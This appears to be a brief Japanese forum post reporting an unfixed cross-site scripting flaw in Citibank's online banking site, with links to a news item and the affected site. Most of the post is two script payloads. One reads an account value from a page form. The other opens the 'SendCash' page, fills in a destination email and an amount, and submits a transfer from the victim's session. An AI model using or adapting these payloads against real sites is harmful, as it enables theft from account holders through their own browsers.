02/01/11 02:31
未解決!シティバンクのオンラインサイトにクロスサイトスクリプティング問題
URLリンク(www.zdnet.co.jp)
URLリンク(www.c2it.com)
<script> setTimeout("alert(document.forms[0].SRC_ACCOUNT.options[1].value)", 400); </script>
-------
<script>
w=window.open("SendCash", "s","");
setTimeout("f=w.document.forms[0];f.DEST_EMAIL.value='u@you.com';
f.AMOUNT.value=10;f.submit();",15000);
setTimeout("w.document.forms[0].submit();", 15000);
</script>
-----
URLリンク(www.devitry.com)